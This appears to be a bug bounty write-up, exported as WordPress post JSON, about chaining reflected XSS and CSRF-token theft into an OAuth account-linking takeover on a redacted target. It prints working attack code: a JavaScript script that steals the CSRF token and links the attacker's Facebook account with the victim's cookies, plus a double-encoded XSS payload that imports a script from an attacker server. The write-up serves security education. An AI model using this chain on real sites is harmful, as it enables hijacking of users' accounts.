{"id":81,"date":"2026-03-07T03:59:37","date_gmt":"2026-03-07T03:59:37","guid":{"rendered":"https:\/\/stories.secone4all.com\/?p=81"},"modified":"2026-03-09T09:18:30","modified_gmt":"2026-03-09T09:18:30","slug":"how-i-used-reflected-xss-cors-to-get-1-click-oauth-misconfiguration","status":"publish","type":"post","link":"https:\/\/stories.secone4all.com\/index.php\/2026\/03\/07\/how-i-used-reflected-xss-cors-to-get-1-click-oauth-misconfiguration\/","title":{"rendered":"How I Used Reflected XSS + CORS + CSRF to Get 1-Click OAuth Misconfiguration"},"content":{"rendered":"\n<p class=\"has-black-color has-blush-bordeaux-gradient-background has-text-color has-background has-link-color wp-elements-5362171f0a9f1cd6c2a9b7032133ca0b\"><strong>Hellllllllo brothers,<br>Today I will show how I escalated Reflected XSS to One Click or even Zero Click ATO via escalating the XSS + CORS to OAuth Misconfiguration.<\/strong><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p class=\"has-pale-cyan-blue-background-color has-background\"><strong>While I was testing, I registered an account and started discovering and browsing all features on my target to better understand the target. During this process, I found on the Settings page that I can connect my account with social login like Facebook or Google login. When I saw that, I said that I should test OAuth Misconfiguration here; this is something known for all bug bounty. To better understand this feature and how it&#8217;s working, this makes it easy for you to log in to your account with your Google account or Facebook account. 
When you click on connect to Facebook, for example, this is what happens:<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>You are redirected to your Facebook account.<\/strong><br><\/li>\n\n\n\n<li><strong>You click on Sign in with Facebook.<\/strong><br><\/li>\n\n\n\n<li><strong>Now your account is connected with your Facebook account.<\/strong><br><\/li>\n<\/ol>\n\n\n\n<p><strong>This means you can log in to your account using your Facebook account. Based on this information, if we can connect the victim&#8217;s account with our Facebook account, it will allow us to log in to the victim&#8217;s account using our Facebook account.<\/strong><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><em>PoC Steps:<\/em><\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>I started by going to connect your Facebook account and clicked on connect to my Facebook account. When I intercepted the final request, it was as shown below:<\/strong><\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"92\" src=\"https:\/\/stories.secone4all.com\/wp-content\/uploads\/2026\/03\/IMG_3585-1024x683.png\" alt=\"\" class=\"wp-image-92\" srcset=\"https:\/\/stories.secone4all.com\/wp-content\/uploads\/2026\/03\/IMG_3585-1024x683.png 1024w, https:\/\/stories.secone4all.com\/wp-content\/uploads\/2026\/03\/IMG_3585-300x200.png 300w, https:\/\/stories.secone4all.com\/wp-content\/uploads\/2026\/03\/IMG_3585-768x512.png 768w, https:\/\/stories.secone4all.com\/wp-content\/uploads\/2026\/03\/IMG_3585.png 1536w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\"
\/><\/figure>\n<\/figure>\n\n\n\n<p class=\"has-black-background-color has-background\"><strong>Based on the above request, if we can craft a CSRF attack to make the victim submit the above request, our Facebook account will be connected to the victim&#8217;s account.<\/strong><\/p>\n\n\n\n<details class=\"wp-block-details\"><summary><strong>The <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color is-layout-flow wp-block-details-is-layout-flow\">external_account_id<\/mark> refers to the attacker&#8217;s Facebook account.<\/strong><\/summary>\n<p><strong>Let&#8217;s analyze the request and see how we can force the victim to submit this malicious request, which will give us full control of the victim&#8217;s account.<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"has-pale-cyan-blue-color has-text-color has-link-color wp-elements-21f9c090b235d6af5e4a1f1362fcd064\"><strong>If we look at the request, it has <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">Content-Type: application\/json<\/mark><\/code>, so normally it&#8217;s difficult to get CSRF here, and there is also an <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">X-Csrf-Token<\/mark><\/code> header that works as a CSRF token. Looking at all of this, we would say it&#8217;s impossible to do anything, but as an amazing hacker, you should never give up.
Let&#8217;s dive into the next part.<\/strong> <\/li>\n<\/ul>\n\n\n\n<p class=\"has-vivid-cyan-blue-background-color has-background\"><strong>I continued testing on my target, and after around 2 days I found XSS on the same domain. That&#8217;s great to test my previous scenario. XSS means that we can execute JS code, and the XSS is on the same domain. This means that we can execute JS code on the same domain, and the application trusts any JS code execution that is coming from the same domain. That&#8217;s great. Now the Same Origin Policy (SOP) no longer stands in our way, because our JS code runs on the same origin as the application.<\/strong><\/p>\n\n\n\n<p><strong>Now I thought about how I can send this request using JS code:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code alignwide has-cyan-bluish-gray-background-color has-background\"><code>POST \/api\/v3\/ajax\/member\/external-account\/link HTTP\/2\nHost: www.target.com\nCookie: Cookie\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko\/20100101 Firefox\/148.0\nAccept: *\/*\nAccept-Language: en-US,en;q=0.9\nAccept-Encoding: gzip, deflate, br\nReferer: https:\/\/www.target.com\/your\/account\/security\nX-Page-Guid: 101fba8b4af8.5455445.00\nContent-Type: application\/json\nX-Csrf-Token: 3:1772845972:GQtnXMLEiQY_awcp7g2WgF4sHstC:f213b523bd14144e92ffeda0b0be69d2059a986fdffbc69936acadce666925c4\nX-Detected-Locale: USD|en-US|EG\nContent-Length: 102\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nPriority: u=4\nTe: trailers\n\n{\"account_type\":\"facebook\",\"external_account_id\":\"122144551334981997\",\"id_token\":\"12210458215434981997\"}<\/code><\/pre>\n<\/details>\n\n\n\n<p class=\"has-pale-cyan-blue-background-color
has-background\"><strong>Before I thought about how I can submit the request using JS, I thought about how I can add <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">X-Csrf-Token<\/mark><\/code> to the request, because if I submit the request without including <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">X-Csrf-Token<\/mark><\/code>, the request doesn&#8217;t work due to the missing <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">CSRF token<\/mark>. So this makes this issue a very complex one, but as I mentioned above, take your cup of tea and neverrrrrrr give up, bro.<\/strong><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p><strong>Now I thought, is it possible to use CORS to get the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">X-Csrf-Token<\/mark><\/code> and include it in the submit request PoC? After a long time, I was able to get the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">X-Csrf-Token<\/mark><\/code> value using the script I will add. I found that when I browsed this endpoint, <code>https:\/\/www.target.com\/your\/account\/security<\/code>, I noticed that <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">X-Csrf-Token<\/mark><\/code> is embedded in a meta tag in the HTML source code. Great, now I can send malicious JS code to get the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">X-Csrf-Token<\/mark><\/code> named <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">csrf_nonce<\/mark><\/code>. 
Here is the PoC:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-green-cyan-color has-black-background-color has-text-color has-background has-link-color wp-elements-4c37e976b09ee0bdf48b58374d1b0a0d\"><code>async function fetchCsrfToken() {\n    try {\n        \/\/ Fetch the security page (cookies must be sent!)\n        let resp = await fetch(\"https:\/\/www.target.com\/your\/account\/security\", {\n            method: \"GET\",\n            credentials: \"include\" \/\/ \ud83d\udd11 send cookies\n        });\n\n        let text = await resp.text();\n\n        \/\/ Parse the HTML response\n        let parser = new DOMParser();\n        let doc = parser.parseFromString(text, \"text\/html\");\n\n        \/\/ Extract the meta tag content\n        let meta = doc.querySelector('meta&#91;name=\"csrf_nonce\"]');\n        return meta ? meta.content : null;\n    } catch (e) {\n        console.error(\"Error fetching CSRF token:\", e);\n        return null;\n    }\n}\n<\/code><\/pre>\n\n\n\n<p><strong>Now we need the script that combines stealing the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">CSRF token<\/mark> and submitting the request, including the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">CSRF token.<\/mark><\/strong><\/p>\n\n\n\n<p><strong>I am not perfect at JS code, but now you don&#8217;t need to take a very long time learning programming languages because you can use AI to fix errors in your script. 
Here is my PoC:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code has-black-background-color has-text-color has-background has-link-color wp-elements-3dbdddc67d15d1a79999a5520f8e0ad4\" style=\"color:#12ea24\"><code>async function fetchCsrfToken() {\n    try {\n        \/\/ Fetch the security page (cookies must be sent!)\n        let resp = await fetch(\"https:\/\/www.target.com\/your\/account\/security\", {\n            method: \"GET\",\n            credentials: \"include\" \/\/ \ud83d\udd11 send cookies\n        });\n\n        let text = await resp.text();\n\n        \/\/ Parse the HTML response\n        let parser = new DOMParser();\n        let doc = parser.parseFromString(text, \"text\/html\");\n\n        \/\/ Extract the meta tag content\n        let meta = doc.querySelector('meta&#91;name=\"csrf_nonce\"]');\n        return meta ? meta.content : null;\n    } catch (e) {\n        console.error(\"Error fetching CSRF token:\", e);\n        return null;\n    }\n}\n\nasync function submitRequest() {\n    const csrf = await fetchCsrfToken(); \/\/ Get CSRF token first\n    if (!csrf) {\n        console.error(\"CSRF token not found. 
Aborting request.\");\n        return;\n    }\n\n    var xhr = new XMLHttpRequest();\n    xhr.open(\"POST\", \"https:\/\/www.target.com\/api\/v3\/ajax\/member\/external-account\/link\", true);\n\n    \/\/ Required headers\n    xhr.setRequestHeader(\"accept\", \"*\/*\");\n    xhr.setRequestHeader(\"accept-language\", \"en-US,en;q=0.5\");\n    xhr.setRequestHeader(\"content-type\", \"application\/json\");\n\n    \/\/ Add CSRF token header\n    xhr.setRequestHeader(\"X-Csrf-Token\", csrf);\n\n    \/\/ Include victim cookies\n    xhr.withCredentials = true;\n\n    \/\/ Body to link external account\n    var body = JSON.stringify({\n        account_type: \"facebook\",\n        external_account_id: \"759525443476339\",\n        id_token: \"759525443476339\"\n    });\n\n    xhr.send(body);\n}\n\n\/\/ Execute automatically\nsubmitRequest();\n<\/code><\/pre>\n\n\n\n<details class=\"wp-block-details\"><summary><strong>If we look at the first section, we will see that this section gets the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color is-layout-flow wp-block-details-is-layout-flow\">CSRF token<\/mark>. Section two uses the captured<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\"> CSRF token <\/mark>and submits the body parameters as they exist in the HTTP request. Now we have the script that can submit the ATO request for us. Now we reach the final step: how we can use this script. As I mentioned above, we will submit it via <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">XSS found on the same domain<\/mark>. 
The XSS was via <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">double URL encoding<\/mark>, and this is the payload.<\/strong><\/summary>\n<pre class=\"wp-block-code has-vivid-red-color has-pale-cyan-blue-background-color has-text-color has-background has-link-color wp-elements-8cd075fbf8d0d4174729c30c4ff30871\"><code>%2522%253E%253CA%2520HRef%253D%252F%252Fmyserver%252Ecom%252Foauth2%252Ejs%2520AutoFocus%2520%2526%252362%2520OnFocus%250C%253Dimport%2528href%2529%253E%250A<\/code><\/pre>\n<\/details>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p><strong>Now we need to host the above script on our <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">server (VPS)<\/mark> in a file that should end with <code>.js<\/code>. For example, I will name it <code>oauth.js<\/code>, and call this script using the XSS payload below via the import function.<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code has-black-color has-vivid-cyan-blue-background-color has-text-color has-background has-link-color wp-elements-ffd53546ef0583f86c1260a7b19ccdbe\"><code>%2522%253E%253CA%2520HRef%253D%252F%252Fmyserver%252Ecom%252Foauth2%252Ejs%2520AutoFocus%2520%2526%252362%2520OnFocus%250C%253Dimport%2528href%2529%253E%250A\n<\/code><\/pre>\n\n\n\n<p><strong>This is the decoded version of the payload:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code has-luminous-vivid-orange-color has-black-background-color has-text-color has-background has-link-color wp-elements-b6355144121b405a3b11f01d286cb438\"><code>\"&gt;&lt;A HRef=\/\/myserver.com\/oauth2.js AutoFocus &amp;#62 OnFocus\f=import(href)&gt;<\/code><\/pre>\n\n\n\n<p><strong>The final PoC:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code has-white-color has-black-background-color has-text-color has-background has-link-color
wp-elements-567f0590e78139d4c65892bb033c163e\"><code>https:&#47;&#47;www.target.com\/codeascraft\/search\/%2522%253E%253CA%2520HRef%253D%252F%252Fmyserver%252Ecom%252Foauth2%252Ejs%2520AutoFocus%2520%2526%252362%2520OnFocus%250C%253Dimport%2528href%2529%253E%250A<\/code><\/pre>\n\n\n\n<p class=\"has-vivid-green-cyan-background-color has-text-color has-background has-link-color wp-elements-1840d69baa9654a4312ece6c7e5601c7\" style=\"color:#2100d1\"><strong>Now when the victim visits the final PoC link, my Facebook account (attacker&#8217;s account) will be connected to the victim&#8217;s account, allowing me to log in to the victim&#8217;s account and get full control of the victim&#8217;s account.<\/strong><\/p>\n\n\n\n<p>This is the response:<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-2 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"83\" src=\"https:\/\/stories.secone4all.com\/wp-content\/uploads\/2026\/03\/reer-1024x683.png\" alt=\"\" class=\"wp-image-83\" srcset=\"https:\/\/stories.secone4all.com\/wp-content\/uploads\/2026\/03\/reer-1024x683.png 1024w, https:\/\/stories.secone4all.com\/wp-content\/uploads\/2026\/03\/reer-300x200.png 300w, https:\/\/stories.secone4all.com\/wp-content\/uploads\/2026\/03\/reer-768x512.png 768w, https:\/\/stories.secone4all.com\/wp-content\/uploads\/2026\/03\/reer.png 1536w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p class=\"has-pale-pink-color has-pale-ocean-gradient-background has-text-color has-background has-link-color wp-elements-e5fb5d40411d9ea429ffabf9c468c76d\"><strong>Thank you, brothers.
I hope this was useful for you.<\/strong> \ud83d\udc4d<\/p>\n\n\n\n<ul class=\"wp-block-social-links is-layout-flex wp-block-social-links-is-layout-flex\"><li class=\"wp-social-link wp-social-link-linkedin  wp-block-social-link\"><a href=\"https:\/\/www.linkedin.com\/in\/muhammad-mubarak-941b85290?utm_source=share&#038;utm_campaign=share_via&#038;utm_content=profile&#038;utm_medium=ios_app\" class=\"wp-block-social-link-anchor\"><svg width=\"24\" height=\"24\" viewBox=\"0 0 24 24\" version=\"1.1\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" aria-hidden=\"true\" focusable=\"false\"><path d=\"M19.7,3H4.3C3.582,3,3,3.582,3,4.3v15.4C3,20.418,3.582,21,4.3,21h15.4c0.718,0,1.3-0.582,1.3-1.3V4.3 C21,3.582,20.418,3,19.7,3z M8.339,18.338H5.667v-8.59h2.672V18.338z M7.004,8.574c-0.857,0-1.549-0.694-1.549-1.548 c0-0.855,0.691-1.548,1.549-1.548c0.854,0,1.547,0.694,1.547,1.548C8.551,7.881,7.858,8.574,7.004,8.574z M18.339,18.338h-2.669 v-4.177c0-0.996-0.017-2.278-1.387-2.278c-1.389,0-1.601,1.086-1.601,2.206v4.249h-2.667v-8.59h2.559v1.174h0.037 c0.356-0.675,1.227-1.387,2.526-1.387c2.703,0,3.203,1.779,3.203,4.092V18.338z\"><\/path><\/svg><span class=\"wp-block-social-link-label screen-reader-text\">LinkedIn<\/span><\/a><\/li>\n\n<li class=\"wp-social-link wp-social-link-medium  wp-block-social-link\"><a href=\"https:\/\/medium.com\/@mohammed01550038865\" class=\"wp-block-social-link-anchor\"><svg width=\"24\" height=\"24\" viewBox=\"0 0 24 24\" version=\"1.1\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" aria-hidden=\"true\" focusable=\"false\"><path d=\"M13.2,12c0,3-2.4,5.4-5.3,5.4S2.6,15,2.6,12s2.4-5.4,5.3-5.4S13.2,9,13.2,12 M19.1,12c0,2.8-1.2,5-2.7,5s-2.7-2.3-2.7-5s1.2-5,2.7-5C17.9,7,19.1,9.2,19.1,12 M21.4,12c0,2.5-0.4,4.5-0.9,4.5c-0.5,0-0.9-2-0.9-4.5s0.4-4.5,0.9-4.5C21,7.5,21.4,9.5,21.4,12\"><\/path><\/svg><span class=\"wp-block-social-link-label screen-reader-text\">Medium<\/span><\/a><\/li>\n\n<li class=\"wp-social-link wp-social-link-x  wp-block-social-link\"><a 
href=\"https:\/\/x.com\/mohamme31752968?s=21\" class=\"wp-block-social-link-anchor\"><svg width=\"24\" height=\"24\" viewBox=\"0 0 24 24\" version=\"1.1\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" aria-hidden=\"true\" focusable=\"false\"><path d=\"M13.982 10.622 20.54 3h-1.554l-5.693 6.618L8.745 3H3.5l6.876 10.007L3.5 21h1.554l6.012-6.989L15.868 21h5.245l-7.131-10.378Zm-2.128 2.474-.697-.997-5.543-7.93H8l4.474 6.4.697.996 5.815 8.318h-2.387l-4.745-6.787Z\" \/><\/svg><span class=\"wp-block-social-link-label screen-reader-text\">X<\/span><\/a><\/li><\/ul>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hellllllllo brothers,Today I will show how I escalated Reflected XSS to One Click or even Zero Click ATO via escalating the XSS + CORS to OAuth Misconfiguration. While I was testing, I registered an account and started discovering and browsing all features on my target to better understand the target. During this process, I found [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":83,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[5,7,4,6],"tags":[],"class_list":["post-81","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-bug-bounty","category-bugcrowd","category-ethical-hacking","category-hackerone"],"acf":[],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/stories.secone4all.com\/index.php\/wp-json\/wp\/v2\/posts\/81","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/stories.secone4all.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/stories.secone4all.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/stories.secone4all.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/stories.secone4all.com\/index.php\/wp-json\/wp\/v2\/comments?post=81"}],"version-histo
ry":[{"count":10,"href":"https:\/\/stories.secone4all.com\/index.php\/wp-json\/wp\/v2\/posts\/81\/revisions"}],"predecessor-version":[{"id":102,"href":"https:\/\/stories.secone4all.com\/index.php\/wp-json\/wp\/v2\/posts\/81\/revisions\/102"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/stories.secone4all.com\/index.php\/wp-json\/wp\/v2\/media\/83"}],"wp:attachment":[{"href":"https:\/\/stories.secone4all.com\/index.php\/wp-json\/wp\/v2\/media?parent=81"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/stories.secone4all.com\/index.php\/wp-json\/wp\/v2\/categories?post=81"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/stories.secone4all.com\/index.php\/wp-json\/wp\/v2\/tags?post=81"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}